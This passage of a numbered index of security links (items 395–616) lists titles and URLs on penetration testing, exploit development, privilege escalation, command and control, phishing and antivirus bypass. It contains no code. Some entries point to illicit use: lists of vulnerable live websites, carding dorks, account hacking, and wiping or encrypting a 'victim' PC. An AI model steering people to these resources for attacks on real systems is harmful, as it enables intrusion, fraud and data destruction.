Escalation:\n\n\nhttp://www.bhafsec.com/wiki/index.php/Windows_Privilege_Escalation\n\n\n-396-Removing Sender’s IP Address From Email’s Received: From Header:\n\n\nhttps://www.devside.net/wamp-server/removing-senders-ip-address-from-emails-received-from-header\n\n\n-397-Dump Cleartext Password in Linux PC using MimiPenguin:\n\n\nhttp://www.hackingarticles.in/dump-cleartext-password-linux-pc-using-mimipenguin\n\n\n-398-Embedded Backdoor with Image using FakeImageExploiter:\n\n\nhttp://www.hackingarticles.in/embedded-backdoor-image-using-fakeimageexploiter\n\n\n-399-Exploit Command Injection Vulnearbility with Commix and Netcat:\n\n\nhttp://www.hackingarticles.in/exploit-command-injection-vulnearbility-commix-netcat\n\n\n-400-Exploiting Form Based Sql Injection using Sqlmap:\n\n\nhttp://www.hackingarticles.in/exploiting-form-based-sql-injection-using-sqlmap\n\n\n-401-Beginner Guide to impacket Tool kit:\n\n\nhttp://www.hackingarticles.in/beginner-guide-to-impacket-tool-kit\n\n\n-402-Best of Post Exploitation Exploits & Tricks:\n\n\nhttp://www.hackingarticles.in/best-of-post-exploitation-exploits-tricks\n\n\n-403-Command Injection to Meterpreter using Commix:\n\n\nhttp://www.hackingarticles.in/command-injection-meterpreter-using-commix\n\n\n-404-Comprehensive Guide to Crunch Tool:\n\n\nhttp://www.hackingarticles.in/comprehensive-guide-to-crunch-tool\n\n\n-405-Compressive Guide to File Transfer (Post Exploitation):\n\n\nhttp://www.hackingarticles.in/compressive-guide-to-file-transfer-post-exploitation\n\n\n-406-Crack Wifi Password using Aircrack-Ng (Beginner’s Guide):\n\n\nhttp://www.hackingarticles.in/crack-wifi-password-using-aircrack-ng\n\n\n-407-How to Detect Meterpreter in Your PC:\n\n\nhttp://www.hackingarticles.in/detect-meterpreter-pc\n\n\n-408-Easy way to Hack Database using Wizard switch in Sqlmap:\n\n\nhttp://www.hackingarticles.in/easy-way-hack-database-using-wizard-switch-sqlmap\n\n\n-409-Exploiting the Webserver using Sqlmap and Metasploit (OS-Pwn):\n\n\nhttp://www.hackingarticles.in/exploiting-webserver-using-sqlmap-metasploit-os-pwn\n\n\n-410-Create SSL Certified Meterpreter Payload using MPM:\n\n\nhttp://www.hackingarticles.in/exploit-remote-pc-ssl-certified-meterpreter-payload-using-mpm\n\n\n-411-Port forwarding: A practical hands-on guide:\n\n\nhttps://www.abatchy.com/2017/01/port-forwarding-practical-hands-on-guide\n\n\n-412-Exploit Dev 101: Jumping to Shellcode:\n\nhttps://www.abatchy.com/2017/05/jumping-to-shellcode.html\n\n\n-413-Introduction to Manual Backdooring:\n\n\nhttps://www.abatchy.com/2017/05/introduction-to-manual-backdooring_24.html\n\n\n-414-Kernel Exploitation:\n\n\nhttps://www.abatchy.com/2018/01/kernel-exploitation-1\n\n\n-415-Exploit Dev 101: Bypassing ASLR on Windows:\n\n\nhttps://www.abatchy.com/2017/06/exploit-dev-101-bypassing-aslr-on.html\n\n\n-416-Shellcode reduction tips (x86):\n\n\nhttps://www.abatchy.com/2017/04/shellcode-reduction-tips-x86\n\n\n-417-OSCE Study Plan:\n\n\nhttps://www.abatchy.com/2017/03/osce-study-plan\n\n\n-418-[DefCamp CTF Qualification 2017] Don't net, kids! (Revexp 400):\n\n\nhttps://www.abatchy.com/2017/10/defcamp-dotnot\n\n\n-419-DRUPAL 7.X SERVICES MODULE UNSERIALIZE() TO RCE:\n\n\n\nhttps://www.ambionics.io/\n\n\n\n-420-SQL VULNERABLE WEBSITES LIST 2017 [APPROX 2500 FRESH SQL VULNERABLE SITES]:\n\n\n\nhttps://www.cityofhackerz.com/sql-vulnerable-websites-list-2017\n\n\n-421-Windows IR Live Forensics Cheat Sheet:\n\n\nhttps://www.cheatography.com/tag/forensics/\n\n\n-422-windows-kernel-logic-bug-class-access:\n\n\nhttps://googleprojectzero.blogspot.com/2019/03/windows-kernel-logic-bug-class-access.html\n\n\n\n-423-injecting-code-into-windows-protected:\n\n\nhttps://googleprojectzero.blogspot.com/2018/11/injecting-code-into-windows-protected.html\n\n\n-424-USING THE DDE ATTACK WITH POWERSHELL EMPIRE:\n\n\nhttps://1337red.wordpress.com/using-the-dde-attack-with-powershell-empire\n\n\n-425-Automated Derivative Administrator Search:\n\n\nhttps://wald0.com/?p=14\n\n\n-426-A Red Teamer’s Guide to GPOs and OUs:\n\n\nhttps://wald0.com/?p=179\n\n\n-427-Pen Testing and Active Directory, Part VI: The Final Case:\n\n\nhttps://blog.varonis.com/pen-testing-active-directory-part-vi-final-case/\n\n\n-428-Offensive Tools and Techniques:\n\n\nhttps://www.sec.uno/2017/03/01/offensive-tools-and-techniques/\n\n\n-429-Three penetration testing tips to out-hack hackers:\n\n\nhttp://infosechotspot.com/three-penetration-testing-tips-to-out-hack-hackers-betanews/\n\n\n-430-Introducing BloodHound:\n\n\nhttps://wald0.com/?p=68\n\n\n-431-Red + Blue = Purple:\n\n\nhttp://www.blackhillsinfosec.com/?p=5368\n\n\n-432-Active Directory Access Control List – Attacks and Defense – Enterprise Mobility and Security Blog:\n\n\nhttps://blogs.technet.microsoft.com/enterprisemobility/2017/09/18/active-directory-access-control-list-attacks-and-defense/\n\n\n-433-PrivEsc: Unquoted Service Path:\n\n\nhttps://www.gracefulsecurity.com/privesc-unquoted-service-path/\n\n\n-434-PrivEsc: Insecure Service Permissions:\n\n\nhttps://www.gracefulsecurity.com/privesc-insecure-service-permissions/\n\n\n-435-PrivEsc: DLL Hijacking:\n\n\nhttps://www.gracefulsecurity.com/privesc-dll-hijacking/\n\n\n-436-Android Reverse Engineering 101 – Part 1:\n\n\nhttp://www.fasteque.com/android-reverse-engineering-101-part-1/\n\n\n-437-Luckystrike: An Evil Office Document Generator:\n\n\nhttps://www.shellntel.com/blog/2016/9/13/luckystrike-a-database-backed-evil-macro-generator\n\n\n-438-the-number-one-pentesting-tool-youre-not-using:\n\n\nhttps://www.shellntel.com/blog/2016/8/3/the-number-one-pentesting-tool-youre-not-using\n\n\n-439-uac-bypass:\n\n\nhttp://www.securitynewspaper.com/tag/uac-bypass/\n\n\n-440-XSSer – Automated Framework Tool to Detect and Exploit XSS vulnerabilities:\n\n\nhttps://gbhackers.com/xsser-automated-framework-detectexploit-report-xss-vulnerabilities\n\n\n-441-Penetration Testing on X11 Server:\n\n\nhttp://www.hackingarticles.in/penetration-testing-on-x11-server\n\n\n-442-Always Install Elevated:\n\n\nhttps://pentestlab.blog/2017/02/28/always-install-elevated\n\n\n-443-Scanning for Active Directory Privileges & Privileged Accounts:\n\nhttps://adsecurity.org/?p=3658\n\n\n-444-Windows Server 2016 Active Directory Features:\n\n\nhttps://adsecurity.org/?p=3646\n\n\n-445-powershell:\n\n\nhttps://adsecurity.org/?tag=powershell\n\n\n-446-PowerShell Security: PowerShell Attack Tools, Mitigation, & Detection:\n\n\nhttps://adsecurity.org/?p=2921\n\n\n-447-DerbyCon 6 (2016) Talk – Attacking EvilCorp: Anatomy of a Corporate Hack:\n\n\nhttps://adsecurity.org/?p=3214\n\n\n-448-Real-World Example of How Active Directory Can Be Compromised (RSA Conference Presentation):\n\n\nhttps://adsecurity.org/?p=2085\n\n\n-449-Advanced ATM Penetration Testing Methods:\n\n\nhttps://gbhackers.com/advanced-atm-penetration-testing-methods\n\n\n-450-Background: Microsoft Ofice Exploitation:\n\n\nhttps://rhinosecuritylabs.com/research/abusing-microsoft-word-features-phishing-subdoc/\n\n\n-451-Automated XSS Finder:\n\n\nhttps://medium.com/p/4236ed1c6457\n\n\n-452-Application whitelist bypass using XLL and embedded shellcode:\n\n\nhttps://rileykidd.com/.../application-whitelist-bypass-using-XLL-and-embedded-shellc\n\n\n-453-AppLocker Bypass – Regsvr32:\n\n\nhttps://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32\n\n\n\n-454-Nmap Scans using Hex Value of Flags:\n\n\nhttp://www.hackingarticles.in/nmap-scans-using-hex-value-flags\n\n\n-455-Nmap Scan with Timing Parameters:\n\n\nhttp://www.hackingarticles.in/nmap-scan-with-timing-parameters\n\n\n-456-OpenSSH User Enumeration Time- Based Attack with Osueta:\n\n\nhttp://www.hackingarticles.in/openssh-user-enumeration-time-based-attack-osueta\n\n\n-457-Penetration Testing:\n\n\nhttp://www.hackingarticles.in/web-penetration-testing/\n\n\n-458-Penetration Testing on Remote Desktop (Port 3389):\n\n\nhttp://www.hackingarticles.in/penetration-testing-remote-desktop-port-3389\n\n\n-459-Penetration Testing on Telnet (Port 23):\n\n\nhttp://www.hackingarticles.in/penetration-testing-telnet-port-23\n\n\n-460-Penetration Testing in Windows/Active Directory with Crackmapexec:\n\n\nhttp://www.hackingarticles.in/penetration-testing-windowsactive-directory-crackmapexec\n\n\n-461-Penetration Testing in WordPress Website using WordPress Exploit Framework:\n\n\nhttp://www.hackingarticles.in/penetration-testing-wordpress-website-using-wordpress-exploit-framework\n\n\n-462-Port Scanning using Metasploit with IPTables:\n\n\nhttp://www.hackingarticles.in/port-scanning-using-metasploit-iptables\n\n\n-463-Post Exploitation Using WMIC (System Command):\n\n\nhttp://www.hackingarticles.in/post-exploitation-using-wmic-system-command\n\n\n-464-Privilege Escalation in Linux using etc/passwd file:\n\n\n\nhttp://www.hackingarticles.in/privilege-escalation-in-linux-using-etc-passwd-file\n\n\n-465-RDP Pivoting with Metasploit:\n\n\nhttp://www.hackingarticles.in/rdp-pivoting-metasploit\n\n\n-466-A New Way to Hack Remote PC using Xerosploit and Metasploit:\n\n\nhttp://www.hackingarticles.in/new-way-hack-remote-pc-using-xerosploit-metasploit\n\n\n-467-Shell to Meterpreter using Session Command:\n\n\nhttp://www.hackingarticles.in/shell-meterpreter-using-session-command\n\n\n-468-SMTP Pentest Lab Setup in Ubuntu (Port 25):\n\n\nhttp://www.hackingarticles.in/smtp-pentest-lab-setup-ubuntu\n\n\n-469-SNMP Lab Setup and Penetration Testing:\n\n\nhttp://www.hackingarticles.in/snmp-lab-setup-and-penetration-testing\n\n\n-470-SQL Injection Exploitation in Multiple Targets using Sqlmap:\n\n\nhttp://www.hackingarticles.in/sql-injection-exploitation-multiple-targets-using-sqlmap\n\n\n-471-Sql Injection Exploitation with Sqlmap and Burp Suite (Burp CO2 Plugin):\n\n\nhttp://www.hackingarticles.in/sql-injection-exploitation-sqlmap-burp-suite-burp-co2-plugin\n\n\n-472-SSH Penetration Testing (Port 22):\n\n\nhttp://www.hackingarticles.in/ssh-penetration-testing-port-22\n\n\n-473-Manual Post Exploitation on Windows PC (System Command):\n\n\nhttp://www.hackingarticles.in/manual-post-exploitation-windows-pc-system-command\n\n\n-474-SSH Pivoting using Meterpreter:\n\n\nhttp://www.hackingarticles.in/ssh-pivoting-using-meterpreter\n\n\n-475-Stealing Windows Credentials of Remote PC with MS Office Document:\n\n\nhttp://www.hackingarticles.in/stealing-windows-credentials-remote-pc-ms-office-document\n\n\n-476-Telnet Pivoting through Meterpreter:\n\n\nhttp://www.hackingarticles.in/telnet-pivoting-meterpreter\n\n\n-477-Hack Password using Rogue Wi-Fi Access Point Attack (WiFi-Pumpkin):\n\n\nhttp://www.hackingarticles.in/hack-password-using-rogue-wi-fi-access-point-attack-wifi-pumpkin\n\n\n-478-Hack Remote PC using Fake Updates Scam with Ettercap and Metasploit:\n\n\nhttp://www.hackingarticles.in/hack-remote-pc-using-fake-updates-scam-with-ettercap-and-metasploit\n\n\n-479-Hack Remote Windows 10 Password in Plain Text using Wdigest Credential Caching Exploit:\n\n\nhttp://www.hackingarticles.in/hack-remote-windows-10-password-plain-text-using-wdigest-credential-caching-exploit\n\n\n-480-Hack Remote Windows 10 PC using TheFatRat:\n\n\nhttp://www.hackingarticles.in/hack-remote-windows-10-pc-using-thefatrat\n\n\n-481-2 Ways to Hack Windows 10 Password Easy Way:\n\n\nhttp://www.hackingarticles.in/hack-windows-10-password-easy-way\n\n\n-482-How to Change ALL Files Extension in Remote PC (Confuse File Extensions Attack):\n\n\nhttp://www.hackingarticles.in/how-to-change-all-files-extension-in-remote-pc-confuse-file-extensions-attack\n\n\n-483-How to Delete ALL Files in Remote Windows PC:\n\n\nhttp://www.hackingarticles.in/how-to-delete-all-files-in-remote-windows-pc-2\n\n\n-484-How to Encrypt Drive of Remote Victim PC:\n\n\nhttp://www.hackingarticles.in/how-to-encrypt-drive-of-remote-victim-pc\n\n\n-485-Post Exploitation in Linux With Metasploit:\n\n\nhttps://pentestlab.blog/2013/01/04/post-exploitation-in-linux-with-metasploit\n\n\n-486-Red Team:\n\n\nhttps://posts.specterops.io/tagged/red-team?source=post\n\n\n-487-Code Signing Certi cate Cloning Attacks and Defenses:\n\n\nhttps://posts.specterops.io/tagged/code-signing?source=post\n\n\n-488-Phishing:\n\n\nhttps://posts.specterops.io/tagged/phishing?source=post\n\n\n-489-PowerPick – A ClickOnce Adjunct:\n\n\nhttp://www.sixdub.net/?p=555\n\n\n-490-sql-injection-xss-playground:\n\n\nhttps://ired.team/offensive-security-experiments/offensive-security-cheetsheets/sql-injection-xss-playground\n\n\n-491-Privilege Escalation & Post-Exploitation:\n\n\nhttps://github.com/rmusser01/Infosec_Reference/raw/master/Draft/Privilege%20Escalation%20%26%20Post-Exploitation.md\n\n\n-492-https-payload-and-c2-redirectors:\n\n\nhttps://posts.specterops.io/https-payload-and-c2-redirectors-ff8eb6f87742?source=placement_card_footer_grid---------2-41\n\n\n-493-a-push-toward-transparency:\n\n\nhttps://posts.specterops.io/a-push-toward-transparency-c385a0dd1e34?source=placement_card_footer_grid---------0-41\n\n\n-494-bloodhound:\n\n\nhttps://posts.specterops.io/tagged/bloodhound?source=post\n\n\n-495-active directory:\n\n\nhttps://posts.specterops.io/tagged/active-directory?source=post\n\n\n-496-Load & Execute Bundles with migrationTool:\n\n\nhttps://posts.specterops.io/load-execute-bundles-with-migrationtool-f952e276e1a6?source=placement_card_footer_grid---------1-41\n\n\n-497-Outlook Forms and Shells:\n\n\nhttps://sensepost.com/blog/2017/outlook-forms-and-shells/\n\n\n-498-Tools:\n\n\nhttps://sensepost.com/blog/tools/\n\n\n-499-2018 pentesting resources:\n\n\nhttps://sensepost.com/blog/2018/\n\n\n-500-network pentest:\n\n\nhttps://securityonline.info/category/penetration-testing/network-pentest/\n\n\n-501-[technical] Pen-testing resources:\n\n\nhttps://medium.com/p/cd01de9036ad\n\n\n\n-502-Stored XSS on Facebook:\n\n\nhttps://opnsec.com/2018/03/stored-xss-on-facebook/\n\n\n-503-vulnerabilities:\n\n\nhttps://www.brokenbrowser.com/category/vulnerabilities/\n\n\n-504-Extending BloodHound: Track and Visualize Your Compromise:\n\n\nhttps://porterhau5.com/.../extending-bloodhound-track-and-visualize-your-compromise\n\n\n-505-so-you-want-to-be-a-web-security-researcher:\n\n\nhttps://portswigger.net/blog/so-you-want-to-be-a-web-security-researcher\n\n\n-506-BugBounty — AWS S3 added to my “Bucket” list!:\n\n\nhttps://medium.com/p/f68dd7d0d1ce\n\n\n-507-BugBounty — API keys leakage, Source code disclosure in India’s largest e-commerce health care company:\n\n\nhttps://medium.com/p/c75967392c7e\n\n\n-508-BugBounty — Exploiting CRLF Injection can lands into a nice bounty:\n\n\nhttps://medium.com/p/159525a9cb62\n\n\n-509-BugBounty — How I was able to bypass rewall to get RCE and then went from server shell to get root user account:\n\n\nhttps://medium.com/p/783f71131b94\n\n\n-510-BugBounty — “I don’t need your current password to login into youraccount” - How could I completely takeover any user’s account in an online classi ed ads company:\n\n\nhttps://medium.com/p/e51a945b083d\n\n\n-511-Ping Power — ICMP Tunnel:\n\n\nhttps://medium.com/bugbountywriteup/ping-power-icmp-tunnel-31e2abb2aaea?source=placement_card_footer_grid---------1-41\n\n\n-512-hacking:\n\n\nhttps://www.nextleveltricks.com/hacking/\n\n\n-513-Top 8 Best YouTube Channels To Learn Ethical Hacking Online !:\n\n\nhttps://www.nextleveltricks.com/youtube-channels-to-learn-hacking/\n\n\n-514-Google Dorks List 2018 | Fresh Google Dorks 2018 for SQLi:\n\n\nhttps://www.nextleveltricks.com/latest-google-dorks-list/\n\n\n-515-Art of Shellcoding: Basic AES Shellcode Crypter:\n\n\nhttp://www.nipunjaswal.com/2018/02/shellcode-crypter.html\n\n\n-516-Big List Of Google Dorks Hacking:\n\n\nhttps://xspiyr.wordpress.com/2012/09/05/big-list-of-google-dorks-hacking/\n\n\n-517-nmap-cheatsheet:\n\n\nhttps://bitrot.sh/cheatsheet/09-12-2017-nmap-cheatsheet/\n\n\n-518-Aws Recon:\n\n\nhttps://enciphers.com/tag/aws-recon/\n\n\n-519-Recon:\n\nhttps://enciphers.com/tag/recon/\n\n\n-520-Subdomain Enumeration:\n\n\nhttps://enciphers.com/tag/subdomain-enumeration/\n\n\n-521-Shodan:\n\n\nhttps://enciphers.com/tag/shodan/\n\n\n-522-Dump LAPS passwords with ldapsearch:\n\n\nhttps://malicious.link/post/2017/dump-laps-passwords-with-ldapsearch/\n\n\n-523-peepdf - PDF Analysis Tool:\n\n\nhttp://eternal-todo.com/tools/peepdf-pdf-analysis-tool\n\n\n-524-Evilginx 2 - Next Generation of Phishing 2FA Tokens:\n\n\nbreakdev.org/evilginx-2-next-generation-of-phishing-2fa-tokens/\n\n\n-526-Evil XML with two encodings:\n\n\nhttps://mohemiv.com/all/evil-xml/\n\n\n-527-create-word-macros-with-powershell:\n\n\nhttps://4sysops.com/archives/create-word-macros-with-powershell/\n\n\n-528-Excess XSS A comprehensive tutorial on cross-site scripting:\n\n\nhttps://excess-xss.com/\n\n\n\n-529-Executing Commands and Bypassing AppLocker with PowerShell Diagnostic Scripts:\n\n\nhttps://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/\n\n\n-530-Abusing DCOM For Yet Another Lateral Movement Technique:\n\n\nhttps://bohops.com/2018/04/28/abusing-dcom-for-yet-another-lateral-movement-technique/\n\n\n-531-Trust Direction: An Enabler for Active Directory Enumeration and Trust Exploitation:\n\n\n\nhttps://bohops.com/2017/12/02/trust-direction-an-enabler-for-active-directory-enumeration-and-trust-exploitation/\n\n\n\n-532-Abusing DCOM For Yet Another Lateral Movement Technique:\n\n\nhttps://bohops.com/2018/04/28/abusing-dcom-for-yet-another-lateral-movement-technique/\n\n\n-533-“Practical recon techniques for bug hunters & pen testers”:\n\n\nhttps://blog.appsecco.com/practical-recon-techniques-for-bug-hunters-pen-testers-at-levelup-0x02-b72c15641972?source=placement_card_footer_grid---------2-41\n\n\n-534-Exploiting Node.js deserialization bug for Remote Code Execution:\n\n\nhttps://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/\n\n\n-535-Exploiting System Shield AntiVirus Arbitrary Write Vulnerability using SeTakeOwnershipPrivilege:\n\n\nhttp://www.greyhathacker.net/?p=1006\n\n\n-536-Running Macros via ActiveX Controls:\n\n\nhttp://www.greyhathacker.net/?p=948\n\n\n-537-all=BUG+MALWARE+EXPLOITS\n\n\nhttp://www.greyhathacker.net/?cat=18\n\n\n-538-“FILELESS” UAC BYPASS USING EVENTVWR.EXE AND:\n\n\nhttps://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking\n\n\n-539-BYPASSING UAC ON WINDOWS 10 USING DISK CLEANUP:\n\n\nhttps://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/\n\n\n-540-A Look at CVE-2017-8715: Bypassing CVE-2017-0218 using PowerShell Module Manifests:\n\n\nhttps://enigma0x3.net/2017/11/06/a-look-at-cve-2017-8715-bypassing-cve-2017-0218-using-powershell-module-manifests/\n\n\n-541-“FILELESS” UAC BYPASS USING SDCLT.EXE:\n\n\nhttps://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe\n\n\n-542-File Upload XSS:\n\n\nhttps://medium.com/p/83ea55bb9a55\n\n\n-543-Firebase Databases:\n\n\nhttps://medium.com/p/f651a7d49045\n\n\n-544-Safe Red Team Infrastructure:\n\n\nhttps://medium.com/@malcomvetter/safe-red-team-infrastructure-c5d6a0f13fac\n\n\n-545-RED-TEAM:\n\n\nhttps://cybersyndicates.com/tags/red-team/\n\n\n-546-Egressing Bluecoat with Cobaltstike & Let's Encrypt:\n\n\nhttps://www.youtube.com/watch?v=cgwfjCmKQwM\n\n\n-547-Veil-Evasion:\n\n\nhttps://cybersyndicates.com/tags/veil-evasion/\n\n\n-548-Dangerous Virus For Windows Crashes Everything Hack window Using Virus:\n\n\nhttp://thelearninghacking.com/create-virus-hack-windows/\n\n\n-549-Download Google Dorks List 2019:\n\n\nhttps://medium.com/p/323c8067502c\n\n\n-550-Don’t leak sensitive data via security scanning tools:\n\n\nhttps://medium.com/p/7d1f715f0486\n\n\n-551-CRLF Injection Into PHP’s cURL Options:\n\n\nhttps://medium.com/@tomnomnom/crlf-injection-into-phps-curl-options-e2e0d7cfe545?source=placement_card_footer_grid---------0-60\n\n\n-552-Open Redirects & Security Done Right!:\n\n\nhttps://medium.com/@AkshaySharmaUS/open-redirects-security-done-right-e524a3185496?source=placement_card_footer_grid---------2-60\n\n\n-553-DOM XSS – auth.uber.com:\n\n\nhttps://stamone-bug-bounty.blogspot.com/2017/10/dom-xss-auth_14.html\n\n\n-554-PowerPoint and Custom Actions:\n\n\nhttps://cofense.com/powerpoint-and-custom-actions/\n\n\n-555-exploiting-adobe-coldfusion:\n\n\nhttps://codewhitesec.blogspot.com/2018/03/exploiting-adobe-coldfusion.html\n\n\n\n-556-Command and Control – HTTPS:\n\n\nhttps://pentestlab.blog/2017/10/04/command-and-control-https\n\n\n-557-Command and Control – Images:\n\n\nhttps://pentestlab.blog/2018/01/02/command-and-control-images\n\n\n-558-Command and Control – JavaScript:\n\n\nhttps://pentestlab.blog/2018/01/08/command-and-control-javascript\n\n\n-559-XSS-Payloads:\n\n\n\nhttps://github.com/Pgaijin66/XSS-Payloads\n\n\n-560-Command and Control – Web Interface:\n\n\nhttps://pentestlab.blog/2018/01/03/command-and-control-web-interface\n\n\n-561-Command and Control – Website:\n\n\nhttps://pentestlab.blog/2017/11/14/command-and-control-website\n\n\n-562-Command and Control – WebSocket:\n\n\nhttps://pentestlab.blog/2017/12/06/command-and-control-websocket\n\n\n-563-atomic-red-team:\n\n\nhttps://github.com/redcanaryco/atomic-red-team\n\n\n\n-564-PowerView-3.0-tricks.ps1:\n\n\nhttps://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993\n\n\n-565-awesome-sec-talks:\n\n\nhttps://github.com/PaulSec/awesome-sec-talks\n\n\n-566-Awesome-Red-Teaming:\n\n\nhttps://github.com/yeyintminthuhtut/Awesome-Red-Teaming\n\n\n-567-awesome-php:\n\n\nhttps://github.com/ziadoz/awesome-php\n\n\n-568-latest-hacks:\n\n\nhttps://hackercool.com/latest-hacks/\n\n\n-569-GraphQL NoSQL Injection Through JSON Types:\n\n\nhttp://www.east5th.co/blog/2017/06/12/graphql-nosql-injection-through-json-types/\n\n\n-570-Writing .NET Executables for Pentesters:\n\n\nhttps://www.peew.pw/blog/2017/12/4/writing-net-executables-for-penteters-part-2\n\n\n-571-A curated list of fuzzing resources ( Books, courses - free and paid, videos, tools, tutorials and vulnerable applications to practice on ) for learning Fuzzing and initial phases of Exploit Development like root cause analysis.\n\n\nhttps://github.com/secfigo/Awesome-Fuzzing\n\n\n-572-How to Shutdown, Restart, Logoff, and Hibernate Remote Windows PC:\n\n\nhttp://www.hackingarticles.in/how-to-shutdown-restart-logoff-and-hibernate-remote-windows-pc\n\n\n-572-Injecting Metasploit Payloads into Android Applications – Manually:\n\n\nhttps://pentestlab.blog/2017/06/26/injecting-metasploit-payloads-into-android-applications-manually\n\n\n\n-573-Google Dorks For Carding [Huge List] - Part 1:\n\n\nhttps://hacker-arena.blogspot.com/2014/03/google-dorks-for-carding-huge-list-part.html\n\n\n-574-Google dorks for growth hackers:\n\n\nhttps://medium.com/p/7f83c8107057\n\n\n-575-Google Dorks For Carding (HUGE LIST):\n\n\nhttps://leetpedia.blogspot.com/2013/01/google-dorks-for-carding-huge-list.html\n\n\n-576-BIGGEST SQL Injection Dorks List ~ 20K+ Dorks:\n\n\nhttps://leetpedia.blogspot.com/2013/05/biggest-sql-injection-dorks-list-20k.html\n\n\n-577-Pastebin Accounts Hacking (Facebook/Paypal/LR/Gmail/Yahoo, etc):\n\n\nhttps://leetpedia.blogspot.com/2013/01/pastebin-accounts-hacking.html\n\n\n-578-How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE!:\n\n\nhttp://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html\n\n\n-579-Hijacking VNC (Enum, Brute, Access and Crack):\n\n\nhttps://medium.com/p/d3d18a4601cc\n\n\n-580-Linux Post Exploitation Command List:\n\n\nhttps://github.com/mubix/post-exploitation/wiki\n\n\n-581-List of google dorks for sql injection:\n\n\nhttps://deadlyhacker.wordpress.com/2013/05/09/list-of-google-dorks-for-sql-injection/\n\n\n-582-Microsoft Office – NTLM Hashes via Frameset:\n\n\nhttps://pentestlab.blog/2017/12/18/microsoft-office-ntlm-hashes-via-frameset\n\n\n\n-583-Microsoft Windows 10 - Child Process Restriction Mitigation Bypass:\n\n\nhttps://www.exploit-db.com/download/44888.txt\n\n\n-584-Microsoft Windows CVE-2018-8210 Remote Code Execution Vulnerability:\n\n\nhttps://www.securityfocus.com/bid/104407\n\n\n-585-Microsoft Windows Kernel CVE-2018-0982 Local Privilege Escalation Vulnerability:\n\n\nhttps://www.securityfocus.com/bid/104382\n\n\n-586-miSafes Mi-Cam Device Hijacking:\n\n\nhttps://packetstormsecurity.com/files/146504/SA-20180221-0.txt\n\n\n-587-Low-Level Windows API Access From PowerShell:\n\n\n\nhttps://www.fuzzysecurity.com/tutorials/24.html\n\n\n-588-Linux Kernel 'mm/hugetlb.c' Local Denial of Service Vulnerability:\n\n\nhttps://www.securityfocus.com/bid/103316\n\n\n-589-Lateral Movement – RDP:\n\n\nhttps://pentestlab.blog/2018/04/24/lateral-movement-rdp/\n\n\n-590-Snagging creds from locked machines:\n\n\nhttps://malicious.link/post/2016/snagging-creds-from-locked-machines/\n\n\n-591-Making a Blind SQL Injection a Little Less Blind:\n\n\nhttps://medium.com/p/428dcb614ba8\n\n\n-592-VulnHub — Kioptrix: Level 5:\n\n\nhttps://medium.com/@bondo.mike/vulnhub-kioptrix-level-5-88ab65146d48?source=placement_card_footer_grid---------1-60\n\n\n-593-Unauthenticated Account Takeover Through HTTP Leak:\n\n\nhttps://medium.com/p/33386bb0ba0b\n\n\n-594-Hakluke’s Ultimate OSCP Guide: Part 1 — Is OSCP for you?:\n\n\nhttps://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-1-is-oscp-for-you-b57cbcce7440?source=placement_card_footer_grid---------2-43\n\n\n-595-Finding Target-relevant Domain Fronts:\n\n\nhttps://medium.com/@vysec.private/finding-target-relevant-domain-fronts-7f4ad216c223?source=placement_card_footer_grid---------0-44\n\n\n-596-Safe Red Team Infrastructure:\n\n\nhttps://medium.com/@malcomvetter/safe-red-team-infrastructure-c5d6a0f13fac?source=placement_card_footer_grid---------1-60\n\n\n-597-Cobalt Strike Visualizations:\n\n\nhttps://medium.com/@001SPARTaN/cobalt-strike-visualizations-e6a6e841e16b?source=placement_card_footer_grid---------2-60\n\n\n\n-598-OWASP Top 10 2017 — Web Application Security Risks:\n\n\nhttps://medium.com/p/31f356491712\n\n\n-599-XSS-Auditor — the protector of unprotected:\n\n\nhttps://medium.com/bugbountywriteup/xss-auditor-the-protector-of-unprotected-f900a5e15b7b?source=placement_card_footer_grid---------0-60\n\n\n-600-Netcat vs Cryptcat – Remote Shell to Control Kali Linux from Windows machine:\n\n\nhttps://gbhackers.com/netcat-vs-cryptcat\n\n\n-601-Jenkins Servers Infected With Miner.:\n\n\nhttps://medium.com/p/e370a900ab2e\n\n\n-602-cheat-sheet:\n\n\nhttp://pentestmonkey.net/category/cheat-sheet\n\n\n-603-Command and Control – Website Keyword:\n\n\nhttps://pentestlab.blog/2017/09/14/command-and-control-website-keyword/\n\n\n-604-Command and Control – Twitter:\n\n\nhttps://pentestlab.blog/2017/09/26/command-and-control-twitter/\n\n\n-605-Command and Control – Windows COM:\n\n\nhttps://pentestlab.blog/2017/09/01/command-and-control-windows-com/\n\n\n-606-Microsoft Office – NTLM Hashes via Frameset:\n\n\nhttps://pentestlab.blog/2017/12/18/microsoft-office-ntlm-hashes-via-frameset/\n\n\n-607-PHISHING AGAINST PROTECTED VIEW:\n\n\nhttps://enigma0x3.net/2017/07/13/phishing-against-protected-view/\n\n\n-608-PHISHING WITH EMPIRE:\n\n\nhttps://enigma0x3.net/2016/03/15/phishing-with-empire/\n\n\n-609-Reverse Engineering Android Applications:\n\n\nhttps://pentestlab.blog/2017/02/06/reverse-engineering-android-applications/\n\n\n-610-HTML Injection:\n\n\nhttps://pentestlab.blog/2013/06/26/html-injection/\n\n\n-611-Meterpreter stage AV/IDS evasion with powershell:\n\n\nhttps://arno0x0x.wordpress.com/2016/04/13/meterpreter-av-ids-evasion-powershell/\n\n\n-612-Windows Atomic Tests by ATT&CK Tactic & Technique:\n\n\nhttps://github.com/redcanaryco/atomic-red-team/raw/master/atomics/windows-index.md\n\n\n-613-Windows Active Directory Post Exploitation Cheatsheet:\n\n\nhttps://medium.com/p/48c2bd70388\n\n\n-614-Windows 10 UAC Loophole Can Be Used to Infect Systems with Malware:\n\n\nhttp://news.softpedia.com/news/windows-10-uac-loophole-can-be-used-to-infect-systems-with-malware-513996.shtml\n\n\n-615-How to Bypass Anti-Virus to Run Mimikatz:\n\n\nhttps://www.blackhillsinfosec.com/bypass-anti-virus-run-mimikatz/\n\n\n-616-Userland API Monitoring and Code Injection 